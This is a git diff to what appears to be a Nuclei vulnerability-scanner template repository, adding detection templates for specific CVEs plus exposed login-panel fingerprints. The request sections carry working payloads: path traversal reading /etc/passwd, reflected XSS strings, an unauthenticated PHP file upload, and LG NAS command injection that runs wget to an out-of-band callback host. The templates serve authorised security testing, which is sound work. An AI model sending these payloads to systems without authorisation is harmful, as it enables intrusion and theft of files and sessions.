diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 37911ee048..2a3e83abcb 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -94,4 +94,6 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
 
 ## Tip from us😇
 
-**Nuclei** outcomes are only as excellent as **template matchers💡**
\ No newline at end of file
+- **Nuclei** outcomes are only as excellent as **template matchers💡**
+- Declare at least two matchers to reduce false positive
+- Avoid matching words reflected in the URL to reduce false positive
diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml
new file mode 100644
index 0000000000..557037e9ed
--- /dev/null
+++ b/cves/2009/CVE-2009-5114.yaml
@@ -0,0 +1,27 @@
+id: CVE-2009-5114
+
+info:
+  name: WebGlimpse 2.18.7 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
+  reference: |
+    - https://www.exploit-db.com/exploits/36994
+    - https://www.cvedetails.com/cve/CVE-2009-5114
+  tags: cve,cve2009,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml
new file mode 100644
index 0000000000..80b0e2d0a3
--- /dev/null
+++ b/cves/2012/CVE-2012-0991.yaml
@@ -0,0 +1,27 @@
+id: CVE-2012-0991
+
+info:
+  name: OpenEMR 4.1 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
+  reference: |
+    - https://www.exploit-db.com/exploits/36650
+    - https://www.cvedetails.com/cve/CVE-2012-0991
+  tags: cve,cve2012,lfi,openemr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml
new file mode 100644
index 0000000000..78c28ee6cb
--- /dev/null
+++ b/cves/2014/CVE-2014-4535.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4535
+
+info:
+  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: |
+    - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
+  tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'></script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml
new file mode 100644
index 0000000000..1d3d5293f3
--- /dev/null
+++ b/cves/2014/CVE-2014-4536.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4536
+
+info:
+  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
+  author: daffainfo
+  severity: medium
+  reference: |
+    - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4536
+  tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"></script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml
new file mode 100644
index 0000000000..d2fd7042cb
--- /dev/null
+++ b/cves/2015/CVE-2015-3648.yaml
@@ -0,0 +1,27 @@
+id: CVE-2015-3648
+
+info:
+  name: ResourceSpace - Local File inclusion
+  author: pikpikcu
+  severity: high
+  description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+  reference: |
+    - https://vulners.com/cve/CVE-2015-3648/
+    - https://www.securityfocus.com/bid/75019
+  tags: cve,cve2015,lfi,resourcespace
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml
new file mode 100644
index 0000000000..63d74145e0
--- /dev/null
+++ b/cves/2015/CVE-2015-6544.yaml
@@ -0,0 +1,31 @@
+id: CVE-2015-6544
+
+info:
+  name: iTop XSS
+  author: pikpikcu
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
+  tags: cve,cve2015,xss,itop
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - text/html
diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml
new file mode 100644
index 0000000000..cc437482ec
--- /dev/null
+++ b/cves/2015/CVE-2015-8349.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-8349
+
+info:
+  name: SourceBans XSS
+  author: pikpikcu
+  severity: medium
+  description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
+  tags: cve,cve2015,xss,sourcebans
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - text/
diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml
new file mode 100644
index 0000000000..9f543433f5
--- /dev/null
+++ b/cves/2016/CVE-2016-7981.yaml
@@ -0,0 +1,31 @@
+id: CVE-2016-7981
+
+info:
+  name: SPIP 3.1.2 XSS
+  author: pikpikcu
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
+  tags: cve,cve2016,xss,spip
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"></script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - text/html
diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml
new file mode 100644
index 0000000000..263e4b2bf9
--- /dev/null
+++ b/cves/2017/CVE-2017-15647.yaml
@@ -0,0 +1,27 @@
+id: CVE-2017-15647
+
+info:
+  name: FiberHome - Directory Traversal
+  author: daffainfo
+  severity: medium
+  description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
+  reference: |
+    - https://www.exploit-db.com/exploits/44054
+    - https://www.cvedetails.com/cve/CVE-2017-15647
+  tags: cve,cve2017,lfi,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml
new file mode 100644
index 0000000000..f9c76aab23
--- /dev/null
+++ b/cves/2017/CVE-2017-6090.yaml
@@ -0,0 +1,38 @@
+id: CVE-2017-6090
+
+info:
+  name: PhpCollab (unauthenticated) Arbitrary File Upload
+  author: pikpikcu
+  severity: critical
+  tags: cve,cve2017,phpcollab,rce,fileupload
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
+
+requests:
+  - raw:
+      - | # REQUEST 1
+        POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
+
+        -----------------------------154934846911423734231554128137
+        Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
+        Content-Type: application/x-php
+
+        <?php echo md5('phpcollab_rce');?>
+
+        -----------------------------154934846911423734231554128137--
+
+      - | # REQUEST 2
+        GET /logos_clients/1.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "48dbd2384cb6b996fa1e2855c7f0567f"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml
new file mode 100644
index 0000000000..2562be9725
--- /dev/null
+++ b/cves/2018/CVE-2018-10818.yaml
@@ -0,0 +1,42 @@
+id: CVE-2018–10818
+
+info:
+  name: LG NAS Devices - Remote Code Execution (Unauthenticated)
+  author: gy741
+  severity: critical
+  description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
+  reference: |
+    - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
+  tags: cve,cve2018,lg-nas,rce,oob
+
+requests:
+  - raw:
+      - |
+        POST /system/sharedir.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: curl/7.58.0
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        &uid=10; wget http://{{interactsh-url}}
+
+      - |
+        POST /en/php/usb_sync.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: curl/7.58.0
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        &act=sync&task_number=1;wget http://{{interactsh-url}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml
new file mode 100644
index 0000000000..04aad1e2f5
--- /dev/null
+++ b/cves/2019/CVE-2019-12276.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-12276
+
+info:
+  name: GrandNode 4.40 - Path Traversal
+  author: daffainfo
+  severity: high
+  description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
+  reference: |
+    - https://security401.com/grandnode-path-traversal/
+    - https://www.cvedetails.com/cve/CVE-2019-12276
+  tags: cve,cve2019,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
+    headers:
+      Connection: close
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml
new file mode 100644
index 0000000000..4f414d6385
--- /dev/null
+++ b/cves/2019/CVE-2019-14312.yaml
@@ -0,0 +1,27 @@
+id: CVE-2019-14312
+
+info:
+  name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
+  author: daffainfo
+  severity: high
+  description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
+  reference: |
+    - https://www.exploit-db.com/exploits/47214
+    - https://www.cvedetails.com/cve/CVE-2019-14312
+  tags: cve,cve2019,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml
new file mode 100644
index 0000000000..d272459b58
--- /dev/null
+++ b/cves/2020/CVE-2020-11455.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-11455
+
+info:
+  name: LimeSurvey 4.1.11 - Path Traversal
+  author: daffainfo
+  severity: high
+  description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/48297
+    - https://www.cvedetails.com/cve/CVE-2020-11455
+  tags: cve,cve2020,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml
index 0a5d03ba2a..4d8a08fa63 100644
--- a/cves/2020/CVE-2020-13927.yaml
+++ b/cves/2020/CVE-2020-13927.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-13927
 info:
   name: Unauthenticated Airflow Experimental REST API
   author: pdteam
-  severity: medium
+  severity: critical
   tags: cve,cve2020,apache,airflow,unauth
 
 requests:
@@ -17,4 +17,4 @@ requests:
           - '"dag_run_url":'
           - '"dag_id":'
           - '"items":'
-        condition: and
\ No newline at end of file
+        condition: and
diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml
new file mode 100644
index 0000000000..35c649d8e1
--- /dev/null
+++ b/cves/2020/CVE-2020-26153.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-26153
+
+info:
+  name: Event Espresso Core-Reg XSS
+  author: pikpikcu
+  severity: medium
+  description: |
+    cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+  reference: |
+    - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-26153
+  tags: cve,cve2020,xss,wordpress,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"/></script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        part: header
+        words:
+          - text/html
diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml
new file mode 100644
index 0000000000..31b0f18651
--- /dev/null
+++ b/cves/2020/CVE-2020-27735.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-27735
+
+info:
+  name: Wing FTP's Web Interface XSS
+  author: pikpikcu
+  severity: medium
+  description: |
+    An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
+  tags: cve,cve2020,xss,wing-ftp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/help/english/index.html?javascript&#58;alert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - text/html
diff --git a/cves/2020/CVE 2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml
similarity index 100%
rename from cves/2020/CVE 2020-6171.yaml
rename to cves/2020/CVE-2020-6171.yaml
diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml
new file mode 100644
index 0000000000..30caec3bae
--- /dev/null
+++ b/cves/2020/CVE-2020-9036.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-9036
+
+info:
+  name: Jeedom through 4.0.38 allows XSS
+  author: pikpikcu
+  severity: medium
+  reference: |
+    - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
+  tags: cve,cve2020,xss,jeedom
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - text/html
diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml
new file mode 100644
index 0000000000..7c64193c85
--- /dev/null
+++ b/dns/dnssec-detection.yaml
@@ -0,0 +1,22 @@
+id: dnssec-detection
+
+info:
+  name: DNSSEC Detection
+  description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
+  author: pdteam
+  severity: info
+  tags: dns,dnssec
+  reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
+
+dns:
+  - name: "{{FQDN}}"
+    type: DS
+    class: inet
+    recursion: true
+    retries: 3
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - "IN\tDS\t(.+)"
diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml
new file mode 100644
index 0000000000..ca5b5f04c2
--- /dev/null
+++ b/exposed-panels/camunda-login-panel.yaml
@@ -0,0 +1,31 @@
+id: camunda-login-panel
+info:
+  name: Camunda Login panel
+  author: alifathi-h1
+  severity: info
+  description: Default Credentials of demo:demo on Camunda application.
+  reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
+  tags: camunda,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/app/welcome/default/#!/login'
+      - '{{BaseURL}}/camunda/app/welcome/default/#!/login'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Camunda Welcome"
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<footer cam-widget-footer version="v([0-9.]+)"'
diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml
new file mode 100644
index 0000000000..9e315b83e2
--- /dev/null
+++ b/exposed-panels/cerebro-panel.yaml
@@ -0,0 +1,26 @@
+id: cerebro-panel
+
+info:
+  name: Cerebro Panel
+  author: huowuzhao,elder tao
+  severity: high
+  reference: https://github.com/lmenezes/cerebro
+  tags: panel,cerebro
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers:
+      - type: word
+        words:
+          - "<title>Cerebro</title>"
+        part: body
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "<small>([a-z0-9.]+)</small>"
diff --git a/exposed-panels/cisco-sendgrid.yaml b/exposed-panels/cisco-sendgrid.yaml
new file mode 100644
index 0000000000..d9708bf9f3
--- /dev/null
+++ b/exposed-panels/cisco-sendgrid.yaml
@@ -0,0 +1,30 @@
+id: cisco-sendgrid
+
+info:
+  name: Cisco ServiceGrid
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+  tags: panel,cisco
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/pages/sdcall/Login.jsp'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<div class="top\-margin">Version ([0-9.]+)<\/div>'
diff --git a/exposed-panels/clearpass-policy-manager.yaml b/exposed-panels/clearpass-policy-manager.yaml
new file mode 100644
index 0000000000..57a79fe6af
--- /dev/null
+++ b/exposed-panels/clearpass-policy-manager.yaml
@@ -0,0 +1,23 @@
+id: clearpass-policy-manager
+
+info:
+  name: ClearPass Policy Manager - Aruba Networks
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+  tags: panel,aruba
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/tips/tipsLogin.action'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>ClearPass Policy Manager - Aruba Networks</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/dell-openmanager-login.yaml b/exposed-panels/dell-openmanager-login.yaml
new file mode 100644
index 0000000000..9730b557ef
--- /dev/null
+++ b/exposed-panels/dell-openmanager-login.yaml
@@ -0,0 +1,26 @@
+id: dell-openmanager-login
+
+info:
+  name: Dell OpenManage Switch Administrator
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
+  tags: panel,dell
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/config/authentication_page.htm'
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - '<title>Dell OpenManage Switch Administrator</title>'
+
+      - type: word
+        words:
+          - '<TITLE>Log In</TITLE>'
+          - 'device/logOff_up_menu1.htm'
+        condition: and
diff --git a/exposed-panels/f-secure-policy-manager.yaml b/exposed-panels/f-secure-policy-manager.yaml
new file mode 100644
index 0000000000..52a841605a
--- /dev/null
+++ b/exposed-panels/f-secure-policy-manager.yaml
@@ -0,0 +1,23 @@
+id: f-secure-policy-manager
+
+info:
+  name: F-Secure Policy Manager Server
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
+  tags: login,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>F-Secure Policy Manager Server</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/glpi-authentication.yaml b/exposed-panels/glpi-authentication.yaml
new file mode 100644
index 0000000000..492a0df24e
--- /dev/null
+++ b/exposed-panels/glpi-authentication.yaml
@@ -0,0 +1,24 @@
+id: glpi-authentication
+
+info:
+  name: GLPI - Authentification
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22
+  tags: panel,auth
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>GLPI - Authentication</title>'
+          - 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml
new file mode 100644
index 0000000000..c4cb4ac680
--- /dev/null
+++ b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml
@@ -0,0 +1,23 @@
+id: gxd5-pacs-connexion-utilisateur
+
+info:
+  name: GXD5 Pacs Connexion utilisateur
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22
+  tags: panel,login
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>GXD5 Pacs Connexion utilisateur</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/identity-services-engine.yaml b/exposed-panels/identity-services-engine.yaml
new file mode 100644
index 0000000000..5699d13914
--- /dev/null
+++ b/exposed-panels/identity-services-engine.yaml
@@ -0,0 +1,20 @@
+id: identity-services-engine
+
+info:
+  name: Identity Services Engine
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
+  tags: panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/admin/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Identity Services Engine</title>'
diff --git a/exposed-panels/sgp-login-panel.yaml b/exposed-panels/sgp-login-panel.yaml
new file mode 100644
index 0000000000..15ee1ecf69
--- /dev/null
+++ b/exposed-panels/sgp-login-panel.yaml
@@ -0,0 +1,30 @@
+id: sgp-login-panel
+
+info:
+  name: SGP Panel
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22
+  tags: panel,sgp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/accounts/login?next=/admin/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>SGP</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - ">Ver\\. ([0-9.A-Z]+)</p>"
diff --git a/exposed-panels/xvr-login.yaml b/exposed-panels/xvr-login.yaml
new file mode 100644
index 0000000000..8e1f781632
--- /dev/null
+++ b/exposed-panels/xvr-login.yaml
@@ -0,0 +1,23 @@
+id: xvr-login
+
+info:
+  name: XVR LOGIN
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22
+  tags: panel,xvr
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.rsp'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>XVR LOGIN</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appspec-yml-disclosure.yaml
similarity index 90%
rename from exposures/configs/appsec-yml-disclosure.yaml
rename to exposures/configs/appspec-yml-disclosure.yaml
index d036de812b..a0229fc7c8 100644
--- a/exposures/configs/appsec-yml-disclosure.yaml
+++ b/exposures/configs/appspec-yml-disclosure.yaml
@@ -1,7 +1,7 @@
-id: appsec-yml-disclosure
+id: appspec-yml-disclosure
 
 info:
-  name: Appsec Yml Disclosure
+  name: Appspec Yml Disclosure
   author: dhiyaneshDk
   severity: medium
   reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json
diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml
index 9f030f2ce7..919106075f 100644
--- a/exposures/configs/git-config.yaml
+++ b/exposures/configs/git-config.yaml
@@ -8,16 +8,9 @@ info:
   tags: config,git,exposure
 
 requests:
-  - raw:
-      - |
-        GET /.git/config HTTP/1.1
-        Host: {{Hostname}}
